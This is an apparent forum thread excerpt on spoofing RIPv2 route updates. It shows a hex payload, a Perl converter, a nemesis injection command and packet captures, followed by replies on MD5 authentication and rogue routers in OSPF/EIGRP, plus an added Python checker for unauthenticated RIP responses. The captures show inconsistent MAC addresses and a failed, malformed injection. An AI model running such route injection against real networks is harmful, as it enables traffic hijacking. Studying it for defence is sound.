Quote: |
02020000000200000e000000ffffff00c0a8007f00000002 |
Quote: |
#!/usr/bin/perl -w
### Coded by B4rtm4n (c) 06/05/2005
### HEX to binary
###
###
### Convert datagram to raw ASCII
### Get input from file
#$usage="perl hex2bin.pl hex.file > bin.file\n"
$input = "";
while (<>) {
    $input=$input.$_;
    #print "$input";
}
#$input = chomp ($input);
$x=length($input);   #get the size of the input
$ascii="";           #ensure the string is initially null
for ($y=0; $y < $x; $y++ ) {
    $z=substr($input, $y, 2);   # take the next two hex digits
    $dec= hex ($z);             # convert them to a number
    $ascii= chr ($dec);         # and then to a single byte
    print "$ascii";
    $y++;                       # second increment: step two characters per pass
}
|
Quote: |
MattA@W34p0nX /home/MattA ->perl hex2bin.pl inject > ascii.bin |
Quote: |
W34p0nX# nemesis udp -P /ascii.bin -S 192.168.0.127 -D 192.168.0.1 -x 520 -y 520 -t0
UDP Packet Injected
|
ElToro wrote: |
One note, Cisco does support MD5 authentication even though it's not part of the RFC for RIPv2. OSPF and EIGRP both support MD5 as well. Using authentication is the way to stop this attack.
|
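Added example (not part of any post in this thread): a Python check for the defensive point above. It decodes the RIPv2 payload quoted earlier in the thread and reports responses that carry no authentication entry or come from a source outside a list of known routers. The allowlist and the function names are assumptions made for this example.

```python
import ipaddress
import struct

# RIPv2 payload quoted in the thread, reused here as sample input.
THREAD_PAYLOAD = bytes.fromhex("02020000000200000e000000ffffff00c0a8007f00000002")
TRUSTED_ROUTERS = {"192.168.0.1"}  # constructed allowlist (assumption)

CMD_RESPONSE = 2
AFI_AUTH = 0xFFFF  # a first entry with this address family carries authentication


def parse_rip(payload):
    """Decode a RIP message into command, version, auth type and route entries."""
    if len(payload) < 24 or (len(payload) - 4) % 20:
        raise ValueError("length %d is not header + N*20-byte entries" % len(payload))
    command, version, _ = struct.unpack("!BBH", payload[:4])
    auth_type, routes = None, []
    for off in range(4, len(payload), 20):
        afi, tag, addr, mask, hop, metric = struct.unpack(
            "!HH4s4s4sI", payload[off:off + 20])
        if afi == AFI_AUTH and off == 4:
            auth_type = tag  # 2 = simple password, 3 = keyed message digest
            continue
        net = ipaddress.IPv4Network(
            "%s/%s" % (ipaddress.IPv4Address(addr), ipaddress.IPv4Address(mask)),
            strict=False)
        routes.append({"network": str(net),
                       "next_hop": str(ipaddress.IPv4Address(hop)),
                       "metric": metric})
    return {"command": command, "version": version,
            "auth_type": auth_type, "routes": routes}


def review(src_ip, payload, trusted=TRUSTED_ROUTERS):
    """Return findings for one UDP/520 payload received from src_ip."""
    try:
        msg = parse_rip(payload)
    except (ValueError, struct.error) as exc:
        return ["malformed RIP message: %s" % exc]
    if msg["command"] != CMD_RESPONSE:
        return []
    findings = []
    if src_ip not in trusted:
        findings.append("response from %s, not a listed router" % src_ip)
    if msg["auth_type"] is None:
        findings.append("no authentication entry")
    elif msg["auth_type"] == 2:
        findings.append("cleartext password authentication")
    return findings
```

An empty UDP payload, like the 8-byte UDP length in the thread's second capture, is reported as malformed rather than parsed.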
ElToro wrote: |
I am curious how this technique could be applied to more sophisticated routing protocols like EIGRP or OSPF assuming they were not using authentication. The first issue that comes to mind is the fact that both use their own transport protocol, not TCP or UDP. Second issue is how to manage the connection-oriented way these protocols work. Each uses acknowledgments and sequence numbers so address spoofing would be extremely difficult. |
ElToro wrote: |
I think the easiest way to implement this attack on EIGRP or OSPF is to sniff for the Hello packets and configure a rogue router to join the AS. The router essentially becomes the tool. You would configure the router to advertise the bogus routes and it would take care of the communications protocols. |
Quote: |
W34p0nX# nemesis udp -P /ascii.bin -S 192.168.0.127 -D 192.168.0.1 -x 520 -y 520 -t0 |
Code: |
No. Time Source Destination Protocol Info
45 84.612407 29.77.27.29 180.186.193.112 UDP Source port: 35649 Destination port: 33435

Frame 45 (554 bytes on wire, 554 bytes captured)
    Arrival Time: Oct 22, 2005 08:19:29.461535000
    Time delta from previous packet: 0.606327000 seconds
    Time since reference or first frame: 84.612407000 seconds
    Frame Number: 45
    Packet Length: 554 bytes
    Capture Length: 554 bytes
    Protocols in frame: eth:ip:udp:data
Ethernet II, Src: 00:60:97:41:7f:73, Dst: 00:0f:b5:51:49:be
    Destination: 00:0f:b5:51:49:bc (Netgear_51:49:bc)
    Source: 00:60:97:41:7f:72 (3com_41:7f:72)
    Type: IP (0x0800)
Internet Protocol, Src Addr: 29.77.27.29 (29.77.27.29), Dst Addr: 180.186.193.112 (180.186.193.112)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
    Total Length: 540
    Identification: 0x7f00 (32512)
    Flags: 0x00
    Fragment offset: 0
    Time to live: 255
    Protocol: UDP (0x11)
    Header checksum: 0x8c3b (correct)
    Source: 29.77.27.29 (29.77.27.29)
    Destination: 180.186.193.112 (180.186.193.112)
User Datagram Protocol, Src Port: 35649 (35649), Dst Port: 33435 (33435)
Data (512 bytes)

0000 02 00 00 00 0c 00 04 01 2e 00 00 00 02 00 00 00 ................
0010 0c 00 04 02 2e 2e 00 00 03 00 00 00 10 00 04 05 ................
0020 2e 73 6e 61 70 00 00 00 40 20 00 00 0c 00 04 03 .snap...@ ......
0030 64 65 76 00 c0 60 00 00 0c 00 04 03 74 6d 70 00 dev..`......tmp.
0040 80 40 00 00 0c 00 04 03 75 73 72 00 41 20 00 00 .@......usr.A ..
0050 0c 00 04 03 76 61 72 00 81 40 00 00 10 00 04 05 ....var..@......
0060 73 74 61 6e 64 00 9f c1 c1 60 00 00 0c 00 04 03 stand....`......
0070 65 74 63 00 42 20 00 00 10 00 04 05 63 64 72 6f etc.B ......cdro
0080 6d 00 8f c1 04 00 00 00 10 00 04 04 64 69 73 74 m...........dist
0090 00 f3 8f c1 43 20 00 00 0c 00 04 03 62 69 6e 00 ....C ......bin.
00a0 ca 60 00 00 10 00 04 04 62 6f 6f 74 00 76 9f c1 .`......boot.v..
00b0 67 20 00 00 0c 00 04 03 6c 69 62 00 a4 40 00 00 g ......lib..@..
00c0 10 00 04 07 6c 69 62 65 78 65 63 00 89 20 00 00 ....libexec.. ..
00d0 0c 00 04 03 6d 6e 74 00 a6 40 00 00 10 00 04 04 ....mnt..@......
00e0 70 72 6f 63 00 76 9f c1 8a 20 00 00 10 00 04 06 proc.v... ......
00f0 72 65 73 63 75 65 00 c1 a7 40 00 00 10 00 04 04 rescue...@......
0100 72 6f 6f 74 00 76 9f c1 8e 20 00 00 10 00 04 04 root.v... ......
0110 73 62 69 6e 00 76 9f c1 fd 00 00 00 0c 00 0a 03 sbin.v..........
0120 73 79 73 00 a9 40 00 00 10 00 08 06 2e 63 73 68 sys..@.......csh
0130 72 63 00 c0 ab 40 00 00 14 00 08 08 2e 70 72 6f rc...@.......pro
0140 66 69 6c 65 00 2b 94 cc fe 00 00 00 14 00 08 09 file.+..........
0150 43 4f 50 59 52 49 47 48 54 00 65 c0 ff 00 00 00 COPYRIGHT.e.....
0160 10 00 0a 06 63 6f 6d 70 61 74 00 c1 01 01 00 00 ....compat......
0170 10 00 08 07 65 6e 74 72 6f 70 79 00 02 01 00 00 ....entropy.....
0180 10 00 0a 04 68 6f 6d 65 00 5d 04 c1 03 01 00 00 ....home.]......
0190 0c 00 08 03 6c 6f 67 00 04 01 00 00 18 00 08 0e ....log.........
01a0 64 73 74 75 6d 62 6c 65 72 2e 63 6f 72 65 00 01 dstumbler.core..
01b0 05 01 00 00 0c 00 08 02 2d 61 00 c1 06 01 00 00 ........-a......
01c0 14 00 08 0b 64 77 65 70 64 75 6d 70 6c 6f 67 00 ....dwepdumplog.
01d0 07 01 00 00 30 00 08 06 73 75 6e 6c 6f 67 00 c0 ....0...sunlog..
01e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
Quote: |
perl hex2bin.pl inject > ascii.bin |
Quote: |
02020000000200000e000000ffffff00c0a8007f00000002 |
Code: |
No. Time Source Destination Protocol Info
66 129.179098 192.168.0.127 192.168.0.1 RIP [Malformed Packet]

Frame 66 (42 bytes on wire, 42 bytes captured)
    Arrival Time: Oct 22, 2005 11:08:54.324227000
    Time delta from previous packet: 1.169777000 seconds
    Time since reference or first frame: 129.179098000 seconds
    Frame Number: 66
    Packet Length: 42 bytes
    Capture Length: 42 bytes
    Protocols in frame: eth:ip:udp:rip
Ethernet II, Src: 00:60:97:41:7f:73, Dst: 00:0f:b5:51:49:be
    Destination: 00:0f:b5:51:49:bc (192.168.0.1)
    Source: 00:60:97:41:7f:73 (192.168.0.4)
    Type: IP (0x0800)
Internet Protocol, Src Addr: 192.168.0.127 (192.168.0.127), Dst Addr: 192.168.0.1 (192.168.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
    Total Length: 28
    Identification: 0x6b63 (27491)
    Flags: 0x00
    Fragment offset: 0
    Time to live: 255
    Protocol: UDP (0x11)
    Header checksum: 0xce9c (correct)
    Source: 192.168.0.127 (192.168.0.127)
    Destination: 192.168.0.1 (192.168.0.1)
User Datagram Protocol, Src Port: router (520), Dst Port: router (520)
    Source port: router (520)
    Destination port: router (520)
    Length: 8
    Checksum: 0x79fd (correct)
[Malformed Packet: RIP]
|